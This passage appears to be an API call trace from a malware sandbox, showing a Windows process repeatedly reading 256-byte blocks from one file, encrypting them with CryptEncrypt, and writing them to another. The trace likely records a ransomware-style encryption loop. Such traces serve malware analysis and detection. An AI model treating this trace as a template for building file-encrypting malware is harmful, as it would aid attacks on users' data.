lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.803] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.803] GetLastError () returned 0x0 [0144.803] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.803] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.803] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.803] GetLastError () returned 0x0 [0144.803] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.803] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.803] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.803] GetLastError () returned 0x0 [0144.803] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.803] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.803] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.803] GetLastError () returned 0x0 [0144.803] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.804] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.804] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.804] GetLastError () returned 0x0 [0144.804] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.804] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.804] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.804] GetLastError () returned 0x0 [0144.804] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.804] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.804] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.804] GetLastError () returned 0x0 [0144.804] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.804] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.804] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.804] GetLastError () returned 0x0 [0144.804] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.804] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.804] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.804] GetLastError () returned 0x0 [0144.804] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.804] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.804] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.804] GetLastError () returned 0x0 [0144.804] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.804] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.805] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.805] GetLastError () returned 0x0 [0144.805] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.805] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.805] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.805] GetLastError () returned 0x0 [0144.805] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.805] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.805] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.805] GetLastError () returned 0x0 [0144.805] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.805] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.805] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.805] GetLastError () returned 0x0 [0144.805] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.805] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.806] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.806] GetLastError () returned 0x0 [0144.806] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.806] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.806] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.806] GetLastError () returned 0x0 [0144.806] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.806] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.806] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.806] GetLastError () returned 0x0 [0144.806] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.806] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.806] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.806] GetLastError () returned 0x0 [0144.806] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.806] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.806] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.806] GetLastError () returned 0x0 [0144.806] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.806] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.806] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.806] GetLastError () returned 0x0 [0144.806] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.806] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.806] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.806] GetLastError () returned 0x0 [0144.806] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.807] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.807] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.807] GetLastError () returned 0x0 [0144.807] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.807] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.807] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.807] GetLastError () returned 0x0 [0144.807] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.807] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.807] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.807] GetLastError () returned 0x0 [0144.807] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.807] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.807] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.807] GetLastError () returned 0x0 [0144.807] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.807] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.807] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.807] GetLastError () returned 0x0 [0144.807] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.807] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.807] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.807] GetLastError () returned 0x0 [0144.807] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.807] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.807] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.808] GetLastError () returned 0x0 [0144.808] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.808] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.808] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.808] GetLastError () returned 0x0 [0144.808] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.808] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.808] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.808] GetLastError () returned 0x0 [0144.808] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.808] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.808] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.808] GetLastError () returned 0x0 [0144.808] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.808] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.808] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.808] GetLastError () returned 0x0 [0144.808] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.808] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.808] CryptEncrypt (in: 